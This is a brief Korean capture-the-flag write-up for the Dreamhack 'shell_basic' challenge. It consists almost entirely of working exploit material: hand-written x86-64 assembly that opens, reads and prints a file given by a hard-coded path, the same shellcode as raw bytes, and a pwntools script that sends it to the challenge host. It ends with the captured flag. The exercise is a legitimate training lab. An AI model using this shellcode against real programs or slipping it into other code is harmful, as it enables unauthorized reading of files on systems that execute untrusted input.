Dreamhack-shell_basic

2f 68 6f 6d 65 2f 73 68 65 6c 6c 5f 62 61 73 69 63 2f 66 6c 61 67 5f 6e 61 6d 65 5f 69 73 5f 6c 6f 6f 6f 6f 6f 6f 6e 67
 
이걸 리틀 엔디언으로 16개씩 쪼개서 넣을 것이다.
 
먼저 스택에 넣어주고
push 0x00
mov rax, 0x676e6f6f6f6f6f6f
push rax
mov rax, 0x6c5f73695f656d61
push rax
mov rax, 0x6e5f67616c662f63
push rax
mov rax, 0x697361625f6c6c65
push rax
mov rax, 0x68732f656d6f682f
push rax
 
;open(path, fd, null)
mov rdi, rsp ;stack
xor rsi, rsi
xor rdx,rdx
mov rax, 0x02 //open
syscall
 
;read(fd, buf,size)
mov rdi, rax
mov rsi, rsp
sub rsi,0x30
mov rdx, 0x30
mov rax, 0x00 ;read
syscall
 
;write(1, buf, size)
mov rdi, 0x01
mov rax, 0x01 ;write
syscall
 
xor rdi,rdi
mov rax, 0x3c
syscall
 

from pwn import *

p=remote("host3.dreamhack.games",18660)
p.recvuntil(b'shellcode:')

shellcode=b'\x6a\x00\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05'

p.send(shellcode)
p.interactive()

 
DH{ca562d7cf1db6c55cb11c4ec350a3c0b}